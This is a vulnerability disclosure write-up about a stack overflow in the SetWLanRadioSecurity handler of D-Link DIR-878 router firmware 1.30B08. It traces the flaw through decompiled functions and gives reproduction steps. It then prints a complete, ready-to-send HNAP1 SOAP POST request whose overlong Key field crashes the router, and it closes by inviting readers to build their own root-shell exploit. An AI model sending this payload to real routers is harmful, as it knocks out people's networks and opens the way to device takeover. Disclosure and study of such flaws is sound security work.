D-Link DIR-878 was discovered stack overflow in the SetWLanRadioSecurity module

# D-Link DIR-878 was discovered stack overflow in the SetWLanRadioSecurity module ###### tags: `D-Link` `DIR-878` vendor:D-Link product:DIR-878 version:DIR_878_FW1.30B08.bin type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description D-Link DIR-878 DIR_878_FW1.30B08.bin was discovered to contain a stack overflow via the Key parameter in the SetWLanRadioSecurity module. ## Vulnerability Details In module SetWLanRadioSecurity,the content obtained by the program through /SetWLanRadioSecurity/Key is passed to v23, which is controllable for attacker and then passed into fuction decrypt_aes as a parameter. ![](https://i.imgur.com/tb6rDM7.png) ![](https://i.imgur.com/o4YAWMg.png) ![](https://i.imgur.com/Qacska1.png) After that, it is passed into function sub_426D74 as the first parameter as a2.Besides, we notice that local variable v6 is placed on the stack, which is also passed into function sub_426D74 as the second parameter. ![](https://i.imgur.com/DDR99OK.png) In function sub_426D74, the for loop from line 26 to line 32, first copy a1 to v7 then strtol transfer v7 to a2, which briefly, a2 equals hexdecode(a1).Let's start over again, a1, comes from a2 in function decrypt_aes, a variable is controllable to the attacker.And a2 comes from v6 in function decrypt_aes which is placed on the stack, so when we copy a1 to a2 in sub_426D74, we are basically putting v4's value into v6, which leads to a stack overflow vulnerbility . ![](https://i.imgur.com/dTeLfRi.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Install firmware DIR_878_FW1.30B08.bin to router DIR878 2. Login to 192.168.0.1 as admin 3. Attack with the following POC ![](https://i.imgur.com/pulK4fi.png) ![](https://i.imgur.com/cjbC8LY.png) ``` POST /HNAP1/ HTTP/1.1 Host: 192.168.0.1 Content-Length: 2903 Accept: */* X-Requested-With: XMLHttpRequest HNAP_AUTH: 6308CC54400705CDC272C5CDED0255EA 1675664856301 SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Content-Type: text/xml; charset=UTF-8 Origin: http://192.168.0.1 Referer: http://192.168.0.1/GuestZone.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: uid=S6ZOyU04 Connection: close <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions xmlns="http://purenetworks.com/HNAP1/"><SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>true</Enabled><Mode>802.11bgn</Mode><SSID>dlink-guest</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>40</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>true</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><MUMIMOEnabled>true</MUMIMOEnabled><BandSteeringEnabled>true</BandSteeringEnabled><AirTimeFairnessEnabled>true</AirTimeFairnessEnabled></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>true</Enabled><Type>WPAORWPA2-PSK</Type><Encryption>TKIPORAES</Encryption><KeyRenewal>3600</KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</Key></SetWLanRadioSecurity><SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>true</Enabled><Mode>802.11anac</Mode><SSID>dlink-guest</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>1</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>true</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><MUMIMOEnabled>true</MUMIMOEnabled><BandSteeringEnabled>true</BandSteeringEnabled><AirTimeFairnessEnabled>true</AirTimeFairnessEnabled></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>false</Enabled><Type></Type><Encryption></Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>2d6d4d12a46ef600678580a6573e51612d6d4d12a46ef600678580a6573e51612d6d4d12a46ef600678580a6573e51612d6d4d12a46ef600678580a6573e5161</Key></SetWLanRadioSecurity><SetGuestZoneRouterSettings xmlns="http://purenetworks.com/HNAP1/"><InternetAccessOnly>true</InternetAccessOnly><IPAddress></IPAddress><SubnetMask></SubnetMask><DHCPServer>true</DHCPServer><DHCPRangeStart></DHCPRangeStart><DHCPRangeEnd></DHCPRangeEnd><DHCPLeaseTime>0</DHCPLeaseTime></SetGuestZoneRouterSettings></SetMultipleActions></soap:Body></soap:Envelope> ``` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. ![](https://i.imgur.com/DMgwV2R.png) You can write your own exp to get the root shell.